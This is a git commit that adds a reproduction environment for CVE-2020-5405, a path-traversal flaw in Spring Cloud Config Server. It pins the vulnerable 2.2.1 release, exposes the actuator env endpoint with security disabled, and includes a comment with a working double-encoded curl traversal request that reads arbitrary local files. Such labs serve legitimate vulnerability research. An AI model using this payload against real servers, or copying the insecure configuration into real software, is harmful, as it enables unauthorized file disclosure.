feat:spring cloud config server(CVE-2020-5405)

Author: “threedr3am”

spring/spring-cloud-config-server-CVE-2020-5405/pom.xml

@@ -0,0 +1,44 @@
+<?xml version="1.0" encoding="UTF-8"?>
+<project xmlns="http://maven.apache.org/POM/4.0.0"
+  xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance"
+  xsi:schemaLocation="http://maven.apache.org/POM/4.0.0 http://maven.apache.org/xsd/maven-4.0.0.xsd">
+  <parent>
+    <groupId>org.springframework.boot</groupId>
+    <artifactId>spring-boot-starter-parent</artifactId>
+    <version>2.2.1.RELEASE</version>
+    <relativePath/>
+  </parent>
+  <modelVersion>4.0.0</modelVersion>
+
+  <artifactId>spring-cloud-config-server-CVE-2020-5405</artifactId>
+
+  <dependencies>
+    <dependency>
+      <groupId>org.springframework.boot</groupId>
+      <artifactId>spring-boot-starter</artifactId>
+    </dependency>
+
+    <dependency>
+      <groupId>org.springframework.cloud</groupId>
+      <artifactId>spring-cloud-config-server</artifactId>
+      <version>2.2.1.RELEASE</version>
+    </dependency>
+
+    <dependency>
+      <groupId>org.springframework.boot</groupId>
+      <artifactId>spring-boot-starter-actuator</artifactId>
+    </dependency>
+  </dependencies>
+
+  <build>
+    <plugins>
+      <plugin>
+        <groupId>org.springframework.boot</groupId>
+        <artifactId>spring-boot-maven-plugin</artifactId>
+        <configuration>
+          <fork>true</fork>
+        </configuration>
+      </plugin>
+    </plugins>
+  </build>
+</project>

spring/spring-cloud-config-server-CVE-2020-5405/src/main/java/com/threedr3am/bug/spring/config/server/Application.java

@@ -0,0 +1,17 @@
+package com.threedr3am.bug.spring.config.server;
+
+import org.springframework.boot.SpringApplication;
+import org.springframework.boot.autoconfigure.SpringBootApplication;
+import org.springframework.cloud.config.server.EnableConfigServer;
+
+/**
+ * @author threedr3am
+ */
+@EnableConfigServer
+@SpringBootApplication
+public class Application {
+
+  public static void main(String[] args) {
+    SpringApplication.run(Application.class, args);
+  }
+}

spring/spring-cloud-config-server-CVE-2020-5405/src/main/java/com/threedr3am/bug/spring/config/server/package-info.java

@@ -0,0 +1,31 @@
+/**
+ *
+ * 漏洞点在 org.springframework.cloud.config.server.environment.NativeEnvironmentRepository#getLocations(java.lang.String, java.lang.String, java.lang.String)
+ * 看新版本的patch可以看到，对于location做了和path同样的判断
+ *  @Override
+ *    public synchronized Resource findOne(String application, String profile, String label,
+ * 			String path) {
+ *
+ * 		...
+ * 					String location = locations[i];
+ * 					if (isInvalidEncodedLocation(location)) {
+ * 						continue;
+ *          }
+ * 		...
+ *  }
+ *
+ * org.springframework.cloud.config.server.resource.GenericResourceRepository#isInvalidEncodedLocation
+ *
+ * curl http://127.0.0.1:9988/foo/profiles/%252f..%252f..%252f..%252fUsers%252fxuanyonghao%252ftmp/aaa.xxx
+ * 读取/User/xuanyonghao/tmp/aaa.xxx文件
+ * foo 对应 {application}
+ * profiles 对应 {profiles}
+ * %252f..%252f..%252f..%252fUsers%252fxuanyonghao%252ftmp 对应 {label}
+ *
+ * todo 条件限制：
+ * todo 1. 文件必须有后缀，也就是.txt等等。
+ * todo 2. cloud: config: server: native: search-locations: file:///tmp/{label}，此处的目录需要有{application}或{profiles}或{label}，因为在上述触发点会对url对应段进行替换进来location，导致目录穿越，但是会限制文件后缀
+ *
+ * @author threedr3am
+ */
+package com.threedr3am.bug.spring.config.server;

spring/spring-cloud-config-server-CVE-2020-5405/src/main/resources/application.yml

@@ -0,0 +1,19 @@
+spring:
+  profiles:
+    active: native
+  cloud:
+    config:
+      server:
+        native:
+          search-locations: file:///tmp/{label}
+#        git:
+#          uri: https://github.com/threedr3am/share-project
+management:
+  security:
+    enabled: false
+  endpoints:
+    web:
+      exposure:
+        include: env
+server:
+  port: 9988